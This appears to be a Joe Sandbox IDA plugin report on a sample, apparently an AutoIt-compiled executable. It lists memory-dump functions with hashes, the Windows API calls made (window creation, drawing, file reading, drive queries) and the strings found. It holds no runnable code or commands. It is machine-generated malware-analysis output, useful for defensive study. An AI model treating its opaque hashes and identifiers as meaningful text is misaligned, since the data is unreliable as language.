                                                                                                                        • Opcode ID: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
                                                                                                                        • Instruction ID: b4b2b6670b6a46d1a79ee37a0e1aa948a2e83be6d24b152ad9c1740506fc0e11
                                                                                                                        • Opcode Fuzzy Hash: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
                                                                                                                        • Instruction Fuzzy Hash: 1132F232A001658BDF28CE69D89467D7FA1FF46300F28856BD4EADB792D630DE81DB41
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec936efcb0f7118a000e891df138f9b8d036b195de57d93b07273583f2cc40a5
                                                                                                                        • Instruction ID: 96dd3358aa9fc646125892e4841828c2d94547bf540d9603fff657cf00a5c39a
                                                                                                                        • Opcode Fuzzy Hash: ec936efcb0f7118a000e891df138f9b8d036b195de57d93b07273583f2cc40a5
                                                                                                                        • Instruction Fuzzy Hash: 5A22B270A0460ADFEF14CF68D865AEEBBB5FF48301F10452AE816A7291FB35AD54CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 016094559ed73388142e33932e4bc3b66fab04dd689ab6af4c250150d50482e1
                                                                                                                        • Instruction ID: 569ac9444a55ac1755b9f3dd5d1498b080e8181ff17d1e372d27061967790070
                                                                                                                        • Opcode Fuzzy Hash: 016094559ed73388142e33932e4bc3b66fab04dd689ab6af4c250150d50482e1
                                                                                                                        • Instruction Fuzzy Hash: 5E02E8B1E00206EBDB05DF64D896AADBFB5FF44300F11856AE816DB291E731EE54CB81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction ID: 776d4bfb39ffbb146dbfbe42a2817ca310806dc6a39976d7a32dd73c1ccdbdd8
                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction Fuzzy Hash: C99178732084A34ADB69463E857407EFFE17A923A1B1A0B9DD4F2CB1C5FE24C954E724
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction ID: 7b77afa1755ae17b678c8bd0505fc09574663a2bd1a061a7bc7b46bc2d8ed6bc
                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction Fuzzy Hash: AF9145732098E34EDB2D467A857403EFFE16A923A2B1A079DD4F2CB1C1FE14C964D624
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
                                                                                                                        • Instruction ID: 50b5a69be44266dd7199e9a4bae3124cc82c5a7c218cc410244de98d72f1e9bc
                                                                                                                        • Opcode Fuzzy Hash: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
                                                                                                                        • Instruction Fuzzy Hash: 2F612AF1E0874E66DA785A2849B5BBEAFA4FF8D700F140D19F843DB281E6119E41C355
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction ID: 9127fcd35deeb4ff7a40335f90b528e0281608f6d0aa8d038872b92310812c53
                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction Fuzzy Hash: E98188336094A34DDB6D863A853453EFFE17A923A1B1E079DD4F2CB1C1EE24C554D628
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00592B30
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00592B43
                                                                                                                        • DestroyWindow.USER32 ref: 00592B52
                                                                                                                        • GetDesktopWindow.USER32 ref: 00592B6D
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00592B74
                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00592CA3
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00592CB1
                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592CF8
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00592D04
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00592D40
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D62
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D75
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D80
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00592D89
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D98
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00592DA1
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DA8
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00592DB3
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DC5
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,005AFC38,00000000), ref: 00592DDB
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00592DEB
                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00592E11
                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00592E30
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592E52
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0059303F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-3613752883
                                                                                                                        • Opcode ID: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
                                                                                                                        • Instruction ID: a658e8566bcbc5b811fbe4d2704be4992c5475ad60fac345de20c93da84dea2f
                                                                                                                        • Opcode Fuzzy Hash: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
                                                                                                                        • Instruction Fuzzy Hash: 75027A71A00209AFDB14DF68CC89EAE7FB9FF49310F008558F915AB2A1DB74AD45DB60
APIs
• SetTextColor.GDI32(?,00000000), ref: 005A712F
• GetSysColorBrush.USER32(0000000F), ref: 005A7160
• GetSysColor.USER32(0000000F), ref: 005A716C
• SetBkColor.GDI32(?,000000FF), ref: 005A7186
• SelectObject.GDI32(?,?), ref: 005A7195
• InflateRect.USER32(?,000000FF,000000FF), ref: 005A71C0
• GetSysColor.USER32(00000010), ref: 005A71C8
• CreateSolidBrush.GDI32(00000000), ref: 005A71CF
• FrameRect.USER32(?,?,00000000), ref: 005A71DE
• DeleteObject.GDI32(00000000), ref: 005A71E5
• InflateRect.USER32(?,000000FE,000000FE), ref: 005A7230
• FillRect.USER32(?,?,?), ref: 005A7262
• GetWindowLongW.USER32(?,000000F0), ref: 005A7284
  • Part of subcall function 005A73E8: GetSysColor.USER32(00000012), ref: 005A7421
  • Part of subcall function 005A73E8: SetTextColor.GDI32(?,?), ref: 005A7425
  • Part of subcall function 005A73E8: GetSysColorBrush.USER32(0000000F), ref: 005A743B
  • Part of subcall function 005A73E8: GetSysColor.USER32(0000000F), ref: 005A7446
  • Part of subcall function 005A73E8: GetSysColor.USER32(00000011), ref: 005A7463
  • Part of subcall function 005A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
  • Part of subcall function 005A73E8: SelectObject.GDI32(?,00000000), ref: 005A7482
  • Part of subcall function 005A73E8: SetBkColor.GDI32(?,00000000), ref: 005A748B
  • Part of subcall function 005A73E8: SelectObject.GDI32(?,?), ref: 005A7498
  • Part of subcall function 005A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
  • Part of subcall function 005A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
  • Part of subcall function 005A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
• String ID: @U=u
• API String ID: 4124339563-2594219639
• Opcode ID: 6c2ac13a7f8148bc3d8dcafdc1d86955a9f1c6e57ed0fa64f5bb3adab9c6f695
• Instruction ID: 9e0bcbd9bb9c35c7f9045a8e5b9d3a3e4844c77660121f3b47190b4ba9668048
• Opcode Fuzzy Hash: 6c2ac13a7f8148bc3d8dcafdc1d86955a9f1c6e57ed0fa64f5bb3adab9c6f695
• Instruction Fuzzy Hash: 96A19C72508305AFDB009F60DC48A6FBFE9FF9E320F100A19FA62961A1D730E948DB51
APIs
• DestroyWindow.USER32(?,?), ref: 00528E14
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00566AC5
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00566AFE
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00566F43
  • Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5
• SendMessageW.USER32(?,00001053), ref: 00566F7F
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00566F96
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FAC
• ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FB7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
• String ID: 0$@U=u
• API String ID: 2760611726-975001249
• Opcode ID: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
• Instruction ID: f4de8b26466931e39962bd73c3442262321286c3043d3a9156dd4324a2c4ea55
• Opcode Fuzzy Hash: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
• Instruction Fuzzy Hash: 0C129B30601651EFDB25CF14D888BBABFE9FF5A300F144569E485CB2A2CB32AC55DB91
APIs
• DestroyWindow.USER32(00000000), ref: 0059273E
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0059286A
• SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005928A9
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005928B9
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00592900
• GetClientRect.USER32(00000000,?), ref: 0059290C
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00592955
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00592964
• GetStockObject.GDI32(00000011), ref: 00592974
• SelectObject.GDI32(00000000,00000000), ref: 00592978
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00592988
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00592991
• DeleteDC.GDI32(00000000), ref: 0059299A
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005929C6
• SendMessageW.USER32(00000030,00000000,00000001), ref: 005929DD
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00592A1D
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00592A31
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00592A42
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00592A77
• GetStockObject.GDI32(00000011), ref: 00592A82
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00592A8D
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00592A97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-2771358697
• Opcode ID: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
• Instruction ID: ea1cfc400f18c441bae5644aa6780bcb876581a182681f117f3de12bcfcece12
• Opcode Fuzzy Hash: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
• Instruction Fuzzy Hash: 30B14A71A00219BFEB14DFA8CC89EAE7BA9FB59710F008515F915EB290D770AD44CBA4
APIs
• GetSysColor.USER32(00000012), ref: 005A7421
• SetTextColor.GDI32(?,?), ref: 005A7425
• GetSysColorBrush.USER32(0000000F), ref: 005A743B
• GetSysColor.USER32(0000000F), ref: 005A7446
• CreateSolidBrush.GDI32(?), ref: 005A744B
• GetSysColor.USER32(00000011), ref: 005A7463
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
• SelectObject.GDI32(?,00000000), ref: 005A7482
• SetBkColor.GDI32(?,00000000), ref: 005A748B
• SelectObject.GDI32(?,?), ref: 005A7498
• InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
• GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A752A
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 005A7554
• InflateRect.USER32(?,000000FD,000000FD), ref: 005A7572
• DrawFocusRect.USER32(?,?), ref: 005A757D
• GetSysColor.USER32(00000011), ref: 005A758E
• SetTextColor.GDI32(?,00000000), ref: 005A7596
• DrawTextW.USER32(?,005A70F5,000000FF,?,00000000), ref: 005A75A8
• SelectObject.GDI32(?,?), ref: 005A75BF
• DeleteObject.GDI32(?), ref: 005A75CA
• SelectObject.GDI32(?,?), ref: 005A75D0
• DeleteObject.GDI32(?), ref: 005A75D5
• SetTextColor.GDI32(?,?), ref: 005A75DB
• SetBkColor.GDI32(?,?), ref: 005A75E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID: @U=u
• API String ID: 1996641542-2594219639
• Opcode ID: 45fe74a14a4e07a35c79856ecf4ed0ce2e3e3c2aae3c0d2febab0e85b02c4953
• Instruction ID: fd6aa1b34001fde29dca1707c8de140ed363b044908c8989d770abc0267c3d0f
• Opcode Fuzzy Hash: 45fe74a14a4e07a35c79856ecf4ed0ce2e3e3c2aae3c0d2febab0e85b02c4953
• Instruction Fuzzy Hash: 19614A72D04218AFDF019FA4DC49AAEBFB9FF0E320F114525F915AB2A1D7749940DB90
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00584AED
• GetDriveTypeW.KERNEL32(?,005ACB68,?,\\.\,005ACC08), ref: 00584BCA
• SetErrorMode.KERNEL32(00000000,005ACB68,?,\\.\,005ACC08), ref: 00584D36
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: af38697ff0efed5f1ef071ea9d655a5d1dde414de93feebda0aef2ca71669c9e
• Instruction ID: a4fe4a10574a2f80bbe6cb3e0c7aae25122c1ee87098477094d33ddda477cca2
• Opcode Fuzzy Hash: af38697ff0efed5f1ef071ea9d655a5d1dde414de93feebda0aef2ca71669c9e
• Instruction Fuzzy Hash: 9F619F306052079BCB24FF28DA859A8BFB5BB44300B248817EC06BB391DB71ED42DF51
APIs
• CharUpperBuffW.USER32(?,?), ref: 005A02E5
• _wcslen.LIBCMT ref: 005A031F
• _wcslen.LIBCMT ref: 005A0389
• _wcslen.LIBCMT ref: 005A03F1
• _wcslen.LIBCMT ref: 005A0475
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005A04C5
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005A0504
  • Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD
  • Part of subcall function 0057223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572258
  • Part of subcall function 0057223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0057228A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
• Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-1753161424
• Opcode ID: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
• Instruction ID: 984c2dfb9d2ae1228b1a1d95e6a528d2329a0da863f49a3b135384f9c8660dd6
• Opcode Fuzzy Hash: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
• Instruction Fuzzy Hash: F2E1AE312282019FCB14DF28C45496EBBE2BFCA314F14496DF8969B3A1EB30ED45CB91
APIs
• GetCursorPos.USER32(?), ref: 005A1128
• GetDesktopWindow.USER32 ref: 005A113D
• GetWindowRect.USER32(00000000), ref: 005A1144
• GetWindowLongW.USER32(?,000000F0), ref: 005A1199
• DestroyWindow.USER32(?), ref: 005A11B9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005A11ED
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A120B
